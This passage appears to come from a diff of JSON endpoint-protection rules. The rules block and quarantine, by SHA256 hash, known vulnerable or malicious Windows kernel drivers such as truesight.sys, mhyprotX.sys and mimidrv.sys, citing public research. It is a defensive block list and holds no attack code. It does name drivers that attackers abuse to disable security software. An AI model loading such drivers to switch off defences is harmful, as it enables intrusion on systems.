+ "comment": "Vulnerable Kernel Driver (aka amifldrv64.sys) [https://www.loldrivers.io/drivers/a5eb98bf-2133-46e8-848f-a299ea0ddefa/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "993772fd-1844-50bc-be33-e18d49270d62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821926Z",
+ "creation_date": "2026-03-23T11:45:30.821929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7436cb59411572a6194bfffad9f9e5194107da417457d4e20a6ef1d58491e3c9",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "994113c1-2bc3-50b4-884e-9000a46dc595",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475185Z",
+ "creation_date": "2026-03-23T11:45:31.475190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475200Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6267d7ad1aa3b2971299791711f0a06ac7d7813c20b61c8122953adcb55c9735",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "994e8590-5ad3-5b35-b8ea-ab50ba267657",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621315Z",
+ "creation_date": "2026-03-23T11:45:29.621317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3e3719ca592ba65a67f594ec1a08d0d7ad724b088be77d48cb33627c56f4614",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99577592-78e7-50a2-930b-fc4e0a5e76cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486773Z",
+ "creation_date": "2026-03-23T11:45:31.486776Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486784Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ce30adf8c4332331dd63ebc3d6c12b21598c85131536fb7aa8f79dac4975811",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "995e179d-5850-58a2-9acf-93871281a07b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968096Z",
+ "creation_date": "2026-03-23T11:45:29.968098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6191fbda54fba328446966bec7a7208159507a8f64213e2a7202b07af14a538",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "995f0244-9c75-555f-92f2-26e453da7adc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493489Z",
+ "creation_date": "2026-03-23T11:45:31.493492Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c49c9d1e3ef2bc179db8e288ac0db8487447b2f59acc7bce7c610796e49fa4ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "996aab3e-906f-5a01-9e8d-ddd853926182",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140988Z",
+ "creation_date": "2026-03-23T11:45:31.140990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9abd8ca4557157de1f04c741ab1e23d428e61b9e02969ef7670644dd502e44d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "996d17ef-9155-50ee-b7c2-f02b54e64490",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468982Z",
+ "creation_date": "2026-03-23T11:45:30.468985Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f35c5c9f95979f227b6d35f767dd94424285f8960c904188f0624d786ff793c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "999f819f-bfd7-5c3d-83be-d3fc4d8b6b24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810273Z",
+ "creation_date": "2026-03-23T11:45:31.810275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810281Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1c8ebe32fd9e469c1a296ffec12d3ba0a22215a971a8bd5f0fd472e004c6422",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99acf67e-3e83-5e27-a38a-050ae8807a47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812099Z",
+ "creation_date": "2026-03-23T11:45:31.812100Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b558f5f0986b32dae4da3c78671aec42b72b701978259f851bb69baf3bd546f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99ade27e-8f1d-5fbb-919a-8f10d0ae83c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140363Z",
+ "creation_date": "2026-03-23T11:45:31.140365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3ca4c909c558f4475bf892dda820fd5031b03ff5ed96495b358ab0edfd9d1ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99be11e0-7d01-5020-921c-d0ea22ea8c9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622297Z",
+ "creation_date": "2026-03-23T11:45:29.622299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622304Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79e87b93fbed84ec09261b3a0145c935f7dfe4d4805edfb563b2f971a0d51463",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99c5bf2f-456b-52f8-9886-d4ce602ff5bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140745Z",
+ "creation_date": "2026-03-23T11:45:31.140747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26e74cb34a243c8f18f5e4ea5ec95533f2bcca6bc9d3ec9269f6fe4108333a4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99c62b88-066b-5414-babf-089c060aa7b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979912Z",
+ "creation_date": "2026-03-23T11:45:29.979914Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979919Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5",
+ "comment": "Vulnerable Kernel Driver (aka FairplayKD.sys) [https://www.loldrivers.io/drivers/31686f0e-3748-48c2-be09-fc8f3252e780/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99c95f3c-575e-55af-b662-0d99816982c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811453Z",
+ "creation_date": "2026-03-23T11:45:31.811455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0a1627b5e27ab1cd78eaa70d9a405a30f0638c4527c786c14b1f65d1e90c453",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99d00c9e-e2fc-5b33-b3cc-1de749780df9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154604Z",
+ "creation_date": "2026-03-23T11:45:31.154606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154612Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "536990bb05abc07cbbb1bf7a3640807f4217fc68954fae7bba6c69222db031d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99d203bb-5786-58c2-a06a-466336ed3b81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611892Z",
+ "creation_date": "2026-03-23T11:45:29.611894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46cf46e1073b7c99142964b7c4bef1e5285fabcf2c6dbe5be99000a393d9f474",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99dcf548-6afa-552f-b323-ba8c2614b92d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825249Z",
+ "creation_date": "2026-03-23T11:45:31.825252Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a16aaaf76fc0a94f8095ae748e7ae9da0a4e31ffe76492fc6322228f3ebdaf1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99ea1204-3511-5dae-9858-c38f27204fe8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605228Z",
+ "creation_date": "2026-03-23T11:45:29.605230Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605238Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fde1b9d335167c72d64f2a47e71594ba9b6ce1a967aefc86968e9fb3e75f68dc",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99f1fb94-30e7-5c0e-8bd4-f3f48a62184d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613718Z",
+ "creation_date": "2026-03-23T11:45:29.613720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99f33522-ce9e-5bf8-acf6-bd935d1dd7a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478662Z",
+ "creation_date": "2026-03-23T11:45:31.478665Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478673Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38ada3d86644fbf19025a9af5f00f6ffa69b1184d22e83abd43717e826b788f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99fb5604-e536-58eb-a964-4bc491450d75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605845Z",
+ "creation_date": "2026-03-23T11:45:29.605847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3f2ee22dec15061919583e4beb8abb3b29b283e2bcb46badf2bfde65f5ea8dd",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a1b1656-6c47-5d2e-b0eb-557b0b5436b8",
+ "test_maturity_current_count": 0,
